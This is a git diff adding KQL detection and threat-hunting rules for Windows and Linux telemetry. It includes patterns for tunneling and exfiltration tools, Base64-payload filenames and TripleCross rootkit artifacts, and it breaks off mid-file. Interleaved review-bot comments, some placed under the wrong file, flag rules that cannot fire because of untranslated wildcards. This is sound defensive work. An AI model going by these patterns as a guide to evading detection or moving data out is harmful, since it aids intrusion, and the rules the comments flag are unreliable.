+++ b/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious New Instance Of An Office COM Object
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-13
+// Level: medium
+// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
+// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Legitimate usage of office automation via scripting
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\eqnedt32.exe" or FolderPath endswith "\\excel.exe" or FolderPath endswith "\\msaccess.exe" or FolderPath endswith "\\mspub.exe" or FolderPath endswith "\\powerpnt.exe" or FolderPath endswith "\\visio.exe" or FolderPath endswith "\\winword.exe") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql
new file mode 100644
index 00000000..5294fe21
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Tasklist Discovery Command
+// Author: frack113
+// Date: 2021-12-11
+// Level: informational
+// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+// - Likely from users, administrator and different internal and third party applications.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "tasklist" or FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql
new file mode 100644
index 00000000..9e3f60f9
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql
@@ -0,0 +1,14 @@
+// Title: System Information Discovery Via Wmic.EXE
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-19
+// Level: low
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
+// and GPU driver products/versions.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082, detection.threat-hunting
+// False Positives:
+// - VMWare Tools serviceDiscovery scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "caption" or ProcessCommandLine contains "command" or ProcessCommandLine contains "driverversion" or ProcessCommandLine contains "maxcapacity" or ProcessCommandLine contains "name" or ProcessCommandLine contains "osarchitecture" or ProcessCommandLine contains "product" or ProcessCommandLine contains "size" or ProcessCommandLine contains "smbiosbiosversion" or ProcessCommandLine contains "version" or ProcessCommandLine contains "videomodedescription") and (ProcessCommandLine contains "baseboard" or ProcessCommandLine contains "bios" or ProcessCommandLine contains "cpu" or ProcessCommandLine contains "diskdrive" or ProcessCommandLine contains "logicaldisk" or ProcessCommandLine contains "memphysical" or ProcessCommandLine contains "os" or ProcessCommandLine contains "path" or ProcessCommandLine contains "startup" or ProcessCommandLine contains "win32_videocontroller") and ProcessCommandLine contains "get" and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")) and (not(InitiatingProcessCommandLine contains "\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql
new file mode 100644
index 00000000..f6c41498
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Tunneling Tool Execution
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, detection.threat-hunting
+// False Positives:
+// - Legitimate administrators using one of these tools
+
+DeviceProcessEvents
+| where FolderPath endswith "\\httptunnel.exe" or FolderPath endswith "\\plink.exe" or FolderPath endswith "\\socat.exe" or FolderPath endswith "\\stunnel.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql
new file mode 100644
index 00000000..a945269d
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Unusually Long PowerShell CommandLine
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-06
+// Level: low
+// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex ".{1000,}" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows Powershell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql
new file mode 100644
index 00000000..4cb588e6
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql
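Review bot: `ProcessCommandLine matches regex ".{1000,}"` on the `| where` line is an expensive way to test length, and because `.` does not match a newline in Kusto's RE2-based regex engine, a 1000+-character command line that embeds a line break within its first 1000 characters would be missed. The description's intent, "a length of 1000 characters or more", is stated directly and cheaply by `strlen(ProcessCommandLine) >= 1000`; if the converter maps Sigma's `re` modifier to `matches regex` generically, a length-pattern special case in helper.py would fix every rule of this shape.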
@@ -0,0 +1,18 @@
+// Title: Use Short Name Path in Command Line
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
+// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
+// When investigating, examine:
+// - Commands using short paths to access sensitive directories or files
+// - Web servers on Windows (especially Apache) where short filenames could bypass security controls
+// - Correlation with other suspicious behaviors
+// - baseline of short name usage in your environment and look for deviations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting
+// False Positives:
+// - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\")))) and (not(((InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe" or (ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veeam.backup.shell.exe" or (InitiatingProcessFolderPath endswith "\\WebEx\\webexhost.exe" or ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql
new file mode 100644
index 00000000..2ceacb0f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql
@@ -0,0 +1,10 @@
+// Title: Winscp Execution From Non Standard Folder
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") and (not(FolderPath startswith "C:\\Program Files (x86)\\WinSCP\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
new file mode 100644
index 00000000..2adf8368
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
@@ -0,0 +1,12 @@
+// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
+// Author: Michael Haag
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting
+// False Positives:
+// - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql
new file mode 100644
index 00000000..1eba0045
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Created - Registry
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via Registry keys.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting
+// False Positives:
+// - Likely as this is a normal behaviour on Windows
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks*" or RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql
new file mode 100644
index 00000000..24eb1cbb
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql
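Review bot: Both `endswith` operands on the `| where` line end in a literal asterisk (`...\\TaskCache\\Tasks*` and `...\\TaskCache\\Tree*`); KQL string operators have no wildcard, so the query only matches keys whose name literally ends with `*` and the rule never fires. The trailing `*` looks like an unconverted Sigma wildcard, which in KQL becomes a substring test: `RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\"`. Because the KQL files are regenerated by helper.py in the scheduled workflow, the durable fix is in the converter's handling of `*` inside `endswith` values, otherwise the next run reintroduces the dead pattern.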
@@ -0,0 +1,13 @@
+// Title: Command Executed Via Run Dialog Box - Registry
+// Author: Ahmed Farouk, Nasreddine Bencherchali
+// Date: 2024-11-01
+// Level: low
+// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
+// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
+// MITRE Tactic: Execution
+// Tags: detection.threat-hunting, attack.execution
+// False Positives:
+// - Likely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (not(RegistryKey endswith "\\MRUList")) and (not(((RegistryValueData in~ ("%appdata%\\1", "%localappdata%\\1", "%public%\\1", "%temp%\\1", "calc\\1", "dxdiag\\1", "explorer\\1", "gpedit.msc\\1", "mmc\\1", "notepad\\1", "regedit\\1", "services.msc\\1", "winver\\1")) or RegistryValueData contains "ping")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql
new file mode 100644
index 00000000..30f4e16c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Office Trusted Location Updated
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: medium
+// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
+// False Positives:
+// - During office installations or setup, trusted locations are added, which will trigger this rule.
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
new file mode 100644
index 00000000..241b830e
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
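Review bot: The query has no `ActionType` restriction even though the file lives under `registry_set`, so it also fires on `RegistryValueDeleted` and `RegistryKeyDeleted` events for the same `\\Path` values, where there is no value data and only the process-path exclusion decides the outcome. Add `ActionType == "RegistryValueSet"` ahead of the key test on the `where` line, or document that removals are intentionally in scope. The exclusion accepts any image under a `:\Program Files\Microsoft Office\` prefix on any drive letter without checking the binary name; a comment noting that this trusts the install directory's ACLs would help the next reviewer judge the trade-off.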
@@ -0,0 +1,14 @@
+// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace.
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting
+// False Positives:
+// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Shell\\Open\\Command" and (RegistryValueData contains ".AesCryptoServiceProvider" or RegistryValueData contains ".DESCryptoServiceProvider" or RegistryValueData contains ".DSACryptoServiceProvider" or RegistryValueData contains ".RC2CryptoServiceProvider" or RegistryValueData contains ".Rijndael" or RegistryValueData contains ".RSACryptoServiceProvider" or RegistryValueData contains ".TripleDESCryptoServiceProvider") and (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryValueData contains "System.Security.Cryptography."
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql
new file mode 100644
index 00000000..0a47b1af
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql
@@ -0,0 +1,13 @@
+// Title: Service Binary in User Controlled Folder
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-05-02
+// Level: medium
+// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
+// Attackers often use such directories for staging purposes.
+// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
+// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\AppData\\Roaming\\") and (RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\ImagePath") and (not((RegistryValueData contains "C:\\ProgramData\\Microsoft\\Windows Defender\\" and (RegistryKey endswith "\\Services\\WinDefend*" or RegistryKey contains "\\Services\\MpKs")))) and (not((((RegistryValueData contains "C:\\Users\\" and RegistryValueData contains "AppData\\Local\\Temp\\MBAMInstallerService.exe") and RegistryKey contains "\\Services\\MBAMInstallerService") or (RegistryValueData contains "C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe" and RegistryKey contains "\\Services\\ZoomCptService"))))
\ No newline at end of file
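Review bot: The `where` clause is self-contradictory and the rule cannot fire: it requires both `RegistryKey endswith "\\Services*"` and `RegistryKey endswith "\\ImagePath"`, and no key ends with both suffixes (the literal `*` is an untranslated Sigma wildcard, so the first test matches nothing on its own either). Change the key test to `(RegistryKey contains "ControlSet" and RegistryKey contains "\\Services\\") and RegistryKey endswith "\\ImagePath"` and, in the Defender exclusion, `RegistryKey endswith "\\Services\\WinDefend*"` to `RegistryKey contains "\\Services\\WinDefend"`. Separately, the MBAM exclusion accepts any `C:\Users\...\AppData\Local\Temp\MBAMInstallerService.exe`, i.e. exactly the user-writable service path this rule exists to catch; if that is an accepted risk, a comment saying so belongs next to it.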
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql
new file mode 100644
index 00000000..f6442fe9
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql
@@ -0,0 +1,12 @@
+// Title: Shell Context Menu Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: low
+// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.threat-hunting
+// False Positives:
+// - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc.
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Classes*" and RegistryKey endswith "\\shell*" and RegistryKey endswith "\\command*"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql b/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql
new file mode 100644
index 00000000..03d91df4
--- /dev/null
+++ b/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Linux Doas Conf File Creation
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the creation of doas.conf file in linux host platform.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "/etc/doas.conf"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/persistence_via_cron_files.kql b/KQL/rules/linux/file_event/persistence_via_cron_files.kql
new file mode 100644
index 00000000..67bbd623
--- /dev/null
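Review bot: All three tests on the `where` line are `endswith` checks against a literal trailing asterisk and are mutually exclusive, so this hunt query returns no rows at all. The Sigma wildcards should become substring tests: `RegistryKey contains "\\Software\\Classes\\" and RegistryKey contains "\\shell\\" and RegistryKey contains "\\command"`. As this is a `registry_set` rule, adding `ActionType == "RegistryValueSet"` would also keep key deletions from being reported as tampering.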
+++ b/KQL/rules/linux/file_event/persistence_via_cron_files.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Cron Files
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: medium
+// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003
+// False Positives:
+// - Any legitimate cron file.
+
+DeviceFileEvents
+| where (FolderPath startswith "/etc/cron.d/" or FolderPath startswith "/etc/cron.daily/" or FolderPath startswith "/etc/cron.hourly/" or FolderPath startswith "/etc/cron.monthly/" or FolderPath startswith "/etc/cron.weekly/" or FolderPath startswith "/var/spool/cron/crontabs/") or (FolderPath contains "/etc/cron.allow" or FolderPath contains "/etc/cron.deny" or FolderPath contains "/etc/crontab")
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql b/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql
new file mode 100644
index 00000000..ec5d0c5b
--- /dev/null
+++ b/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Sudoers Files
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: medium
+// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003
+// False Positives:
+// - Creation of legitimate files in sudoers.d folder part of administrator work
+
+DeviceFileEvents
+| where FolderPath startswith "/etc/sudoers.d/"
\ No newline at end of file
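Review bot: The user-crontab prefix on the `where` line, `/var/spool/cron/crontabs/`, only matches the Debian-family layout; on RHEL/Fedora-style hosts per-user crontabs are written directly under `/var/spool/cron/<user>` and are missed by this prefix list. `FolderPath startswith "/var/spool/cron/"` subsumes the existing entry and covers both layouts. The description also reads `which could indicates`; it should say `which could indicate`.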
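Review bot: The description promises detection of "creation of sudoers file or files in sudoers.d", but the `where` clause only covers `/etc/sudoers.d/`; a direct write to `/etc/sudoers` is not matched. Either extend the test to `FolderPath startswith "/etc/sudoers.d/" or FolderPath =~ "/etc/sudoers"` or narrow the description to the drop-in directory. The tags line carries `attack.t1053.003` (cron), which looks copied from the cron rule above rather than chosen for sudoers — `attack.t1548.003` is the sudo sub-technique — and `persiste` should read `persist`.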
diff --git a/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql
new file mode 100644
index 00000000..70d9d6b1
--- /dev/null
+++ b/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Shell Script Creation in Profile Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the creation of shell scripts under the "profile.d" path.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
+// - Regular file creation during system update or software installation by the package manager
+
+DeviceFileEvents
+| where FolderPath contains "/etc/profile.d/" and (FolderPath endswith ".csh" or FolderPath endswith ".sh")
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql
new file mode 100644
index 00000000..dcacdacf
--- /dev/null
+++ b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Filename with Embedded Base64 Commands
+// Author: @kostastsale
+// Date: 2025-11-22
+// Level: high
+// Description: Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.
+// These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027
+// False Positives:
+// - Legitimate files with similar naming patterns (very unlikely).
+
+DeviceFileEvents
+| where FolderPath contains "{echo" or FolderPath contains "{base64,-d}"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql
new file mode 100644
index 00000000..38fa4642
--- /dev/null
+++ b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Default LockFile
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath =~ "/tmp/rootlog"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql
new file mode 100644
index 00000000..7d60d5c1
--- /dev/null
+++ b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Default Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "ebpfbackdoor"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql b/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql
new file mode 100644
index 00000000..269ff083
--- /dev/null
+++ b/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql
@@ -0,0 +1,12 @@
+// Title: Wget Creating Files in Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate downloads of files in the tmp folder.
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "/wget" and (FolderPath startswith "/tmp/" or FolderPath startswith "/var/tmp/")
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql
new file mode 100644
index 00000000..47020b41
--- /dev/null
+++ b/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql
@@ -0,0 +1,14 @@
+// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-06-17
+// Level: high
+// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
+// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
+// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
+// False Positives:
